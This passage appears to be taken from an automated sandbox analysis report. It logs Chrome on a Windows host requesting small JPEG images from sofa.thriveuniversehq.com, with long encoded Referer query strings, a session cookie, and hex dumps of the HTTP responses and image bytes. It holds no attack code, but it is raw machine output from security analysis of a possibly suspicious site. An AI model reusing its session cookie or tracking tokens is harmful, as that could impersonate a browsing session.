626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:50 UTC697INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 33 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 33 61 38 2d 36 30 38 39 30 32 66 63 34 64 62 33 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 34 38 39 0d
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:50 GMTContent-Type: image/jpegContent-Length: 936Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "3a8-608902fc4db3d"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4489
                                                          2023-11-27 03:23:50 UTC672INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 10 0b 0b 0b 0c 0b 10 0c 0c 10 17 0f 0d 0f 17 1b 14 10 10 14 1b 1f 17 17 17 17 17 1f 1e 17 1a 1a 1a 1a 17 1e 1e 23 25 27 25 23 1e 2f 2f 33 33 2f 2f 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 01 11 0f 0f 11 13 11 15 12 12 15 14 11 14 11 14 1a 14 16 16 14 1a 26 1a 1a 1c 1a 1a 26 30 23 1e 1e 1e 1e 23 30 2b 2e 27 27 27 2e 2b 35 35 30 30 35 35 40 40 3f 40 40 40 40 40 40 40 40 40 40 40 40 ff c0 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 83 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 01 01 00 03 01 01 00 00 00 00 00
                                                          Data Ascii: ExifII*DuckyAdobed#%'%#//33//@@@@@@@@@@@@@@@&&0##0+.'''.+550055@@?@@@@@@@@@@@@22"
                                                          2023-11-27 03:23:50 UTC264INData Raw: ff 00 98 ef ec 1d 88 5d 38 6f 0a 65 8f d8 09 db b9 a4 50 84 df 2b e5 2d 79 32 64 7c 4d 6d b6 0b 02 e3 c2 ab 4c a9 21 fa 83 87 8e c0 d8 63 04 4b 41 de 75 2e 3a 9a 8b 0f 1c f6 d8 5c fc b0 5a ef f8 23 3c ae 91 80 40 5a c2 3b cd b5 28 95 9d d1 31 95 75 1d 21 1a 85 4c d8 4c 32 d2 17 1d ae 15 a1 ba c6 38 1e f3 57 9b 05 75 10 8a b7 69 68 63 95 46 f7 ce 43 5b 57 bc 1d be 80 2f 52 ba 25 ae 8d ae 63 c1 6b b8 82 b6 e4 58 fb 5b 26 49 14 07 e0 8c f4 81 af ad 4f 33 e6 11 8a e3 c4 dd ce fe 47 80 0d 3f 08 4a f8 d6 19 37 0c 2c 9e 78 a5 22 9e e4 25 7e a1 fd 07 b1 08 e5 09 8b 3d 47 2f ff 00 3c 7a 77 9d a7 b7 d2 b8 f8 fe 74 fd 67 5d 75 28 42 9c be aa 76 27 0f b6 fd c4 26 f3 7d ea 1d dc 3e c4 21 51 6c 23 dc f4 90 ff 00 8a 1d 3c a1 e5 f7 74 f9 57 11 ba 70 42 13 fd 1a 50 0f 9f
                                                          Data Ascii: ]8oeP+-y2d|MmL!cKAu.:\Z#<@Z;(1u!LL28WuihcFC[W/R%ckX[&IO3G?J7,x"%~=G/<zwtg]u(Bv'&}>!Ql#<tWpBP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.549743104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC3715OUTGET /people/4.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:50 UTC700INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 30 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 33 65 64 2d 36 30 38 39 30 32 66 63 34 66 61 37 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 32 34 32
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:50 GMTContent-Type: image/jpegContent-Length: 1005Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "3ed-608902fc4fa7d"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4242
                                                          2023-11-27 03:23:50 UTC669INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 10 0b 0b 0b 0c 0b 10 0c 0c 10 17 0f 0d 0f 17 1b 14 10 10 14 1b 1f 17 17 17 17 17 1f 1e 17 1a 1a 1a 1a 17 1e 1e 23 25 27 25 23 1e 2f 2f 33 33 2f 2f 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 01 11 0f 0f 11 13 11 15 12 12 15 14 11 14 11 14 1a 14 16 16 14 1a 26 1a 1a 1c 1a 1a 26 30 23 1e 1e 1e 1e 23 30 2b 2e 27 27 27 2e 2b 35 35 30 30 35 35 40 40 3f 40 40 40 40 40 40 40 40 40 40 40 40 ff c0 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 8d 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 01 07 01 00 03 01 01 01 00 00 00 00
                                                          Data Ascii: ExifII*DuckyAdobed#%'%#//33//@@@@@@@@@@@@@@@&&0##0+.'''.+550055@@?@@@@@@@@@@@@22"
                                                          2023-11-27 03:23:50 UTC336INData Raw: 79 e8 52 fc 8f 5f 8b 7c c4 9b 09 07 69 7d 3a 95 1f 35 cd 0c ce 63 73 c2 66 eb 36 eb 2a db c9 f3 66 23 ce 77 11 c7 de 31 db e6 d0 0b 74 57 a1 33 08 b8 ed 2c 6a 98 3b b5 71 97 69 b3 fa d6 53 b7 fd af 86 f7 d0 9c fa 76 4f f6 63 e3 ef 78 47 1f 6a eb f6 a1 6b aa 64 ff 00 8b 09 19 18 33 12 48 1d 98 94 e3 2c 75 82 83 0b 41 e2 c2 db 86 b5 24 b4 1b 45 f7 82 a1 f2 d9 4b b2 02 33 42 d2 e7 1f bd 3f 0c b8 08 89 e6 df 50 f6 87 58 4a ca 56 bc 8a 1a 72 1e 12 bc 68 05 56 f3 99 25 2c 0c 06 fb 5c 06 a5 3e 49 9b 1e d7 1e 16 8b ca 81 9a 8d c5 8f 91 ee ab a8 49 d5 41 a0 21 8c 92 92 61 28 99 e2 e6 87 10 e1 51 f8 ad 27 94 27 c8 45 31 9f 31 24 70 c9 0b 1c c6 17 10 dc 58 88 35 b6 f2 b2 cf 36 92 9b c4 6a 9e d1 a9 5f 43 3d c9 2d 2e 2f 89 eb 5f 54 e5 ff 00 ea 8a fa f8 8d eb 42 f3 2a
                                                          Data Ascii: yR_|i}:5csf6*f#w1tW3,j;qiSvOcxGjkd3H,uA$EK3B?PXJVrhV%,\>IIA!a(Q''E11$pX56j_C=-./_TB*


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.549744104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC3715OUTGET /people/2.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:50 UTC702INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 34 62 63 2d 36 30 38 39 30 32 66 63 35 30 61 31 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 34 38 39
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:50 GMTContent-Type: image/jpegContent-Length: 1212Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "4bc-608902fc50a1d"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4489
                                                          2023-11-27 03:23:50 UTC667INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 10 0b 0b 0b 0c 0b 10 0c 0c 10 17 0f 0d 0f 17 1b 14 10 10 14 1b 1f 17 17 17 17 17 1f 1e 17 1a 1a 1a 1a 17 1e 1e 23 25 27 25 23 1e 2f 2f 33 33 2f 2f 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 01 11 0f 0f 11 13 11 15 12 12 15 14 11 14 11 14 1a 14 16 16 14 1a 26 1a 1a 1c 1a 1a 26 30 23 1e 1e 1e 1e 23 30 2b 2e 27 27 27 2e 2b 35 35 30 30 35 35 40 40 3f 40 40 40 40 40 40 40 40 40 40 40 40 ff c0 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 8a 00 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 03 05 06 04 02 07 01 01 01 01 01 01 00 00 00 00 00
                                                          Data Ascii: ExifII*DuckyAdobed#%'%#//33//@@@@@@@@@@@@@@@&&0##0+.'''.+550055@@?@@@@@@@@@@@@22"
                                                          2023-11-27 03:23:50 UTC545INData Raw: 12 14 74 fb 69 7c 9f d4 17 10 87 86 2b 81 26 f1 80 55 21 d5 41 ef 15 1e c7 92 b9 b4 95 ce 52 09 72 95 1b 30 d5 4a 71 bd be 41 f9 39 52 84 bb b3 e8 06 ee e6 d3 89 84 a9 05 96 05 2a a0 60 14 15 c4 0a 8d f4 cc d2 5a c1 c8 5e 4a 1f 09 25 56 2c 83 73 9d eb bc 0c ff 00 35 73 0f a9 25 b9 09 13 46 84 90 01 7c d0 21 03 20 40 ca ad f0 bc 85 b4 1f 31 a4 ca 5b 09 5a 3f 1c 6e ca 36 ee 53 d4 1c 2b bc b2 ab 94 a6 47 83 1b 3d 7a 22 9d 8d fd cd c5 a3 cc 55 8e c1 ba 32 e0 29 23 b3 2a 93 24 97 97 b2 c9 6b 75 0b 91 29 28 d8 b6 03 6b 03 98 51 e1 db 55 26 e5 51 20 2f e8 78 1d 3c 0a 8c b9 1c 74 61 d2 94 79 90 23 d8 63 1e a6 00 f8 08 62 b8 f4 62 2a 32 2d 55 fd 29 18 8f d3 af ff 00 b8 7e 27 c8 fb 94 55 cf d5 6c bb 0f c7 c7 df ed a2 a9 ba da 12 8a 6a 63 cc 38 12 43 06 03 42 b9 83
                                                          Data Ascii: ti|+&U!ARr0JqA9R*`Z^J%V,s5s%F|! @1[Z?n6S+G=z"U2)#*$ku)(kQU&Q /x<tay#cbb*2-U)~'Uljc8CB


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.549745104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:50 UTC3715OUTGET /people/1.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: 